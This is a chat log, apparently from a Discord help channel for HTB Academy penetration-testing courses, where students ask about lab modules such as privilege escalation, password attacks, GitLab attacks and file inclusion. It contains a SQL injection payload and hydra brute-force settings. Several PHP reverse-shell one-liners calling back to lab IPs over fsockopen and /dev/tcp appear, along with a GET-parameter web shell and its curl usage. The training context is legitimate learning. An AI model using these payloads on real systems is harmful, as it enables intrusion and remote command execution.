In that first example, we don't know the password, so by injecting admin'-- -, we close out the quotes around the username, and use -- - as a comment to tell the query to ignore everything afterwards.
The second query is a bit different, because now we have parentheses in the mix. If you run the query with the payload from before, the parentheses aren't getting closed out, so the query errors out
right but I wasn't able to do the first one
I get the error in the second screenshot
Am I not supposed to follow along maybe?
You're not supposed to follow along, it's a different example
got it
It's a chump check to make sure you're not just copying and pasting
Still on the Priv Esc bs trying to get the Root flag. I've pulled the id_rsa but now I'm confused. If I do it how the lesson shows, even with the chmod, the server refuses it saying (publickey), but if I do the specific port it asks for a password. Was I supposed to pull a different key or am I doing something wrong?
Can't help you without knowing the module and section
It's Getting Started -> Privilege Escalation
and the comments?
No part of that walkthrough tells you to use an SSH key
Oh wait I was looking at nibbles, my bad
why are u using the pub key
Yeah, you're supposed to use the private key for SSH
if u want to use the pub key u have to add it to /root/.ssh
Because I'm not able to cat the private key and that's what I had seen other people doing.
to use ur public key
Unless I'm supposed to pull the private key using scp or something like that.
u are supposed to be able to read the id_rsa
Then am I looking in the wrong place? Because this is the only ssh directory on the machine.
look at the permissions on /root
RIGGED
just read what u sent lol
.
Now I'm even more confused...
ls -a
sorry, I am kinda slowly getting it. SQL is my weak point. It's embarrassing because it feels like it would be so easy
/etc/ssh is where SSH configuration files are stored, usually not where any keys are
Look at the permissions on /root
You'll get the hang of it soon enough, it's one of those things where you start out looking at references and documentation, then slowly understand the general process of it, without.
You can read up on PortSwigger's and HackTricks' references on SQL injection if you want, I always just copy paste their commands in real CTFs/bbps anyways
I'm doing this question; attached is the hint. I'm running hydra to get the password, ofc the hint given isn't the password. But what I wanted to know is how long is it gonna take hydra to get this password, it's been running for 2hrs now and barely got anywhere
this section is blowing my mind lol, is this what pentesters deal with? holy crap
please can someone help on how I use this python file
```python
from urllib.request import urlopen
from sys import argv, exit
import threading
from colorama import Fore

def check(url):
    ''' check given URL is vulnerable or not '''
    try:
        if "http" not in url: url = "http://" + url
        data = urlopen(url, timeout=3)
        headers = data.info()
        # a page with no anti-framing header can be loaded inside a frame
        if not "X-Frame-Options" in headers: return True
        if not "Content-Security-Policy" in headers: return True
        return False  # both headers present
    except Exception: return False  # unreachable / timeout / bad URL

def listVulnerableSite(url):
    f = open("Vulnerable.txt", "a+")
    f.write(url + "\n")
    f.close()

def main():
    try: sites = open(argv[1], 'r').readlines()
    except Exception: print("[*] Usage: python3 clickjack.py <file_name>"); exit(0)
    for site in sites[0:]:
        status = check(site)
        if status:
            print(Fore.RED + "[+] " + Fore.GREEN + site.split('\n')[0] + Fore.WHITE + " is " + Fore.RED + "Vulnerable")
            listVulnerableSite(site.split('\n')[0])
        elif not status: print(Fore.CYAN + "[-] " + Fore.GREEN + site.split('\n')[0] + Fore.WHITE + " is " + Fore.CYAN + " NOT Vulnerable")
        else: print(Fore.CYAN + 'Every single thing is crashed, Python got mad, dude wtf you just did?')

if __name__ == '__main__': main()
```
if this isn't in an HTB Academy module then you are asking in the wrong place
Does anyone have any info about it?
like this better
didn't see the Fing clickjack.py
god fuckin damnit.
Found it. That's the info I needed no wonder I was so lost...
please explain to me in detail how do i use on vscode or where
keep asking for things like that and you will get the 👢 my guy
how u doing boy
i paste it on my vs code but dont know what to do next
where do I put the link I wanna check or something? I really need some explanation of how this works please
it will tell you
alright
execute it and read what asks
@azure shell this channel is for HTB Academy related modules only, you can take your script kiddie ass to #general
my bad
pls don't show the dumb ass how to run a clickjack script he found online
😦
i mean if he want to learn he can ask here but pasting a clickjack script and asking how to run it isn't the right way to go
where do i learn it
starting by asking question
then that guy will think he is a hacker for running a script he found on the internet
thanks
read #welcome and #rules after that use /verify at #bot-commands if you are on HTB and ask your question in the appropriate channels
a good one tho: if "http" not in url: url = "http://" + url 
alright
good luck sir
@trail leaf @zinc marsh Thanks for the help.
thank you
so any idea how long hydra is gonna take?
password cracking or hashcat module?
ah, hydra,
Okay, now I know why 😄
A cool module, but really not difficult.
It was fun to play with Wireshark
password cracking
wild module
indeed
don't remember if you are in a slow one but get ready 
you love to see it
nah this is slow asf bro
use threads
it depends on what wordlist you use
yea you should make some notes on the modules that you've done
used the mut_passwordlist.txt and I shortened that list with the command you sent me
what's the command for threads?
forgot what command I sent you but if it's for a section then it's meant to be only for that section
Question for the "Password Attacks Lab - Medium" ||Am I supposed to bruteforce the user named dennis over ssh?||
sed -e 1,17000d mut_password.list > short.txt
hydra -t 50 (the more threads you put, the more unstable it gets)
oh I did that, put it at -t 64
then patience
still moving slower than a snail
@high reef hint make the ||mut list|| based on the given "cred" and the given rule
for me it took 2 sec
listen to the wise squirrel
how would i do that ?
hint if you got a shell as user j then do some enum
same command you used to make the mut wordlist, just with the ||given cred|| in the hint this time
like this ?
i'll send you the one i used but you may want to remove this due to spoilers
Holy smoke that was a long time ago. I’m at 80 percent
Keep it up bro!
Anyone know why in Attacking GitLab from ATTACKING COMMON APPLICATIONS the trigger doesnt work for me?? I created a user and did as instructed
Thank you. Been hard stuck with pivot for a while. Took a lot of time off to work on boxes and sharpen my skills
How are you?
windows privesc, pillaging, 3rd question
there is no cookie "d", if i try to make one manually it does not work, how am i supposed to log in?
Because the Lab might be protected against it?
Without knowing in which module and in which section you are currently working, it is difficult to tell you more precisely.
Attacking common applications skills assessment is 👌
no way they say to try out RopeTwo after that module though 
Fun practice 😂
the most you do with that one is open gitlab to find the patched chrome browser 
Hey
I'm not sure why it does this. It's in ATTACKING COMMON APPLICATIONS >> Attacking Gitlab
it does not work, i tried both with devtools and cookie editor
Anyone here going after OSCP after they complete CPTS?
yes
hm, I'd love to help but I was just about to head out, so hopefully someone else can assist you here o7
in the middle of it
I am hoping that completing the CPTS will prepare me for the OSCP
If you need help feel free to DM
Great haha, idk how i ended on your message and u gave me good vibes 🙂
Thank you brother!
That should work.
Try it from the PwnBox
Have you purchased the offsec course or are you studying on your own using boxes from HTB?
There is a course for roughly 5400.00 that incorporates the Offsec course but keeps you on a study schedule so that you can pass the OSCP in three months.
that's ridiculous
I need that structure in order to get out of this boring job
it is a lot I know
but if I can speed up my progress that is what I would be paying for
offsec has their own study schedule that you don't need to pay 5k for
Yo, just a quick question/sanity check
In the module "File Inclusion", Section "Remote File Inclusion (RFI)": Do I need to port forward my http/ftp/smb server? The RFI keeps giving me the error "No route to host" even tho I am connected to the VPN and am using the IP address of the corresponding interface.
Ok, maybe I will take that path; after I finish the CPTS I need to get going with it
My connection was really buggy today, I wasn't sure why. I might try again in an hour and see if it's any different
If you've got that kind of money to burn, just get Unlimited 💀
That just allows for unlimited access, my goal is to get the OSCP asap to get a job in the field of penetration testing. What would you do with the unlimited subscription?
Try it from the PwnBox
Got the same error earlier today from that.
Can't start it anymore until tomorrow. 😅
I will check again then.
Resolved! More than a couple of times it's been that, so weird. Wonder when it will happen in the field!
Send me your attempt by DM.
Then I'll see if you're doing something wrong or if it's the lab
I'd get at least three certs from it, four if I really push it, but I don't have that kind of money. In any case, you really don't need to spend that, there's plenty of schedules you can follow both by offsec and recommendations from people who've done the exam
Will do, thank you. 
The question is whether you can easily get a job with OSCP. I don't think it's that easy.
I am 44 years old, ran and sold my MSP, currently working for an insurance company dealing with ransomware events. I have a good amount of real world experience but am pivoting to penetration testing. Have been getting certification after certification in cyber security. I am hoping that with the OSCP this will be my shot in to a decent job and then allow my skills to further develop.
OSCP helps but the market sucks ass right now
5k is still too ridiculous for a study plan even if you've got money to burn.
at that price you better be getting 1 on 1 dedicated tutoring
What do you recommend if anything?
fwiw I finished CPTS and am currently doing the offsec course. Bit under 3 weeks in and despite taking an entire weekend off and a couple extra days cause I was sick, I'm over 30% done with the entire course already
oh wow congratz, wish you all the best on your new journey (you have been blessed by the helpful squirrel)
i'm sorry what? how tf is that course 5 Fing K?
it isn't
someone's selling him a study plan for 5k
oh wtf 🤣
right? maybe after I pass I should start a side hustle selling my study plan for 1k and undercut em 😂
Haha at
with the "leak" that i saw even a simple study plan for all of the free or cheap platform would be better or equal to damn course
Dont get me wrong, theres some things ive learned or liked from their newly updated materials, but it feels like panhandling for gold and Id probably have learned the same things just from doing more boxes.
the latest update was the only good update in while for the course but still 2.5K though
oh that's for the year
guys
1599 for 90 day lab, course materials, and exam attempt
also want to ask for the lab update are you getting private lab now?
I can't enter the .htb sites
you do
for the machines
add to /etc/hosts
I did, nothing works
then you did it wrong
can you show me how please
read #welcome and #rules after that use /verify at #bot-commands if you are on HTB and ask your question in the appropriate channels
ip_address websitename.htb
yup that's how I did it and it didn't work
ok
press x to doubt
yea
there may be another step before you can access the site for the box that you are on, or it could be that there is no web server running on the box you are on
so it's better if you ask in the right channels
Hi guys, need some help with "Footprinting - SNMP" task 3: "Enumerate the custom script that is running on the system and submit its output as the answer." I do not understand what I should do in the shell...
In Attacking Common Applications module -> Attacking Gitlab section, the question is "Find another valid user on the target GitLab instance". I have tried blasting away a couple of wordlists from SecLists/Usernames, and also some other wordlists, against the target, but none of the usernames returned are accepted by the website. Am I missing something or is it possible that the machine has not been fully set up to return the right one?
for this one you kinda have to blindly look for the wordlist in SecLists, so you can use cat on all of the username wordlists and output them into a dump file and use that, and I think it only took me like 3-4 min or something like that
just use | grep "The username" when you are running the brute forcing tool
hint ||snmpwalk||
hi I'm trying to get a reverse shell on this last section of the Getting Started module and I'm putting this into the theme's PHP but I don't see why it's not working:
<?php -r '$sock=fsockopen("10.129.42.249",1234);shell_exec("/bin/sh -i <&3 >&3 2>&3");' /?>
I'm following the reverse shell from this web page just like someone on here recommended:
I'm trying to gain root
in my terminal on the Parrot OS VM I am trying to use netcat but it's not giving me any results
The payload you have in the code block isn’t valid PHP
You copied and pasted the command you’d run in the command line to call PHP, into a PHP file, and it doesn’t work like that
I've kinda done that already, with the following:
```
┌─[eu-academy-2]─[10.10.15.37]─[htb-ac-468575@htb-mz7g8hcrz5]─[~]
└──╼ [★]$ cat /opt/useful/SecLists/Usernames/*.txt | awk '{ print tolower($0) }' | sort | uniq -u > users.txt
┌─[eu-academy-2]─[10.10.15.37]─[htb-ac-468575@htb-mz7g8hcrz5]─[~]
└──╼ [★]$ cat users.txt | wc -l
7466435
```
But that's been going for a very long time already
PentestMonkey script should have you covered
Ok thanks. I'm just doing getting started module so I guess I'm too much of a noob to actually be good with reverse shells.
php -r is a CLI argument, and cannot be used in the context of a php script
ok so what if I made it a BASH command
No need to apologize, only thing that matters is that you learn from it and understand things
ok thanks
and you are using the 49821.sh script from searchsploit right? the one on exploit-db has an issue
If you want to run command line stuff from a PHP file, you want to use the system() function
<?php system("ANY_COMMAND_YOU_WANT"); ?>
I'm using the python3 variant one (gitlab_userenum.py)
Better yet, use the $_GET variable so you can change commands with different GET requests
<?php system($_GET['parameter_name']); ?>
To run commands:
curl http://vulnerable.com/shell.php?parameter_name=<YOUR_COMMAND_HERE>
but that's a bit beyond the scope of the module
also from what I remember of the module, it's def advised to get a proper rev shell. Working purely through a web shell will be a pita for the next part
hello, can someone help me on zephyr in pm ??
no
this channel isnt for prolabs
Verify your account following #welcome and ask in #prolabs-zephyr
yea then I can't help with that script but the other one works fine for me (with the username dump thing)
but if you want a hint for the right username wordlist then hint use one of the ||cirt|| one
I suppose you've done the dump in the same/similar way I did it?
oh nope i didn't do the filter thing
so is this closer:
<?php shell_exec( -r '$sock=fsockopen("10.129.42.249",1234);shell_exec("/bin/sh -i <&3 >&3 2>&3");' )?>
wait hold on
Hm, can't share the screenshot, but I've run the ||cirt-*|| one and received 2 4-letter usernames. I guess I'll just need to rebuild the machine
read #welcome and #rules after that use /verify at #bot-commands to send screenshot here
oh f... I needed to type it in the full-uppercase form and not lowercase. 😐 it accepted it now 🤦♂️
nice 👍
this also doesn't work:
<?php shell_exec(sh -i >& /dev/tcp/10.129.42.249/1234 0>&1) ?>
Why are some questions allowing case-insensitive answers, and others case-sensitive, I'll never understand I guess (especially since here the usernames are not case sensitive) 😅
gotta wrap the arguments to shell_exec in quotes
yeah
Proper syntax is:
function_name('literal argument')
this syntax isn't working:
<?php shell_exec('sh -i >& /dev/tcp/10.10.15.25/1234 0>&1') ?>
You can use either single or double quotes
should I change IP?
the ip should be your ip
and also make sure you have a listener
I did
Syntax looks alright. Change the IP to your IP address (ip a) and run the listener on the specified port
Is the 10.10.15.25 your IP address, or the one from the content?
the parrot OS vm which is "my IP address" is 10.10.15.25
I did ifconfig
so for sure that's my IP
the target IP is 10.129.42.249
And how are you starting the listener?
nc -lvnp 1234
I do code on left and then submit and then start netcat and then load the new tab and it does nothing
Okay, from what I see, you are creating a file. To execute that code, you need to open that file in your browser. By pressing the save, you are just saving the changes.
I did open file in browser tho
I hit save and go to new tab and it doesn't work
after I open netcat
Well, that's weird then. Maybe try changing sh to /bin/sh and see if that works?
it still didn't work
what would you do at this point?
lmao I'm assuming next I go into root folder and get flag once I get root privileges right?
I would recommend trying another payload. For example, the one you sent previously
ok sure
This command, but use it as:
<?php $sock=fsockopen("10.129.42.249",1234);shell_exec("/bin/sh -i <&3 >&3 2>&3"); ?>
Just update the IP address
Maybe shell_exec is blocked, but you can use some other function which executes system-level commands (e.g. system(), exec(), ...)
```
┌─[us-academy-1]─[10.10.15.25]─[htb-ac-605555@htb-gtt4raddms]─[~]
└──╼ [★]$ nc -lvnp 1234
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.42.249.
Ncat: Connection from 10.129.42.249:46888.
```
To make sure that the file is able to process the PHP code, I would try with a simple:
<?php echo "Test"; ?> and seeing if that helps
eyyyyy
shouldnt be
Anyone able to give me a hand on the pivoting and port forwarding skills assessment, I'm stuck on the final q
ya we got a little closer
try hitting enter a couple times then type id
sometimes with these revshells you just don't get a prompt up front but it's still working
It's probably not blocked, just doesn't give a full shell experience you're used to 😉
Anything specific?
Stumped as to how I can pth to get into the DC
I've tried a double port forward
Can't seem to crack the password
I actually forgot how the skill assessment looks like, but I think you can do pth from the second machine in the chain, no need to do it from your parrot one. But I might be wrong actually
It's more of a thought than the answer, sorry 😐
have you solved this??
The first windows one?
Yeah I was tired 🤣
do I just type the full command into the php code in the browser?
how do you solve that problem
I mean it just doesn't give me "the full shell experience I'm used to"
no type into the connection you received
I forgot the full setup involved in it, but I meant it from the machine that has the access to the server you want to execute pth on
ok but I don't have a shell so how do I do that
but you do
Just put in the right place
For example, if you have Host1 -> host2 -> host3 -> host4, and you want to execute PTH to host4, you can maybe do it from the host3 and not host1
after the connection is received, hit enter twice, type id, hit enter and you'll see what I mean
yeah I have mimikatz on host 3 so will give that a go
??
Try typing whoami in the netcat session you received. If you receive back an answer, you can then upgrade the shell to an interactive one
Good luck! I'll be leaving in 2 mins, hopefully that'll help you out. I do remember it took me some time trying to get a full network access from my parrot machine and realizing there was an easier way. I think that was the easier one, but can't remember 😅
Ok, I need a bit of help. I am probably missing a simple step - doing the Footprinting Lab - Easy
I have downloaded the id_rsa key from the ftp
change the permissions
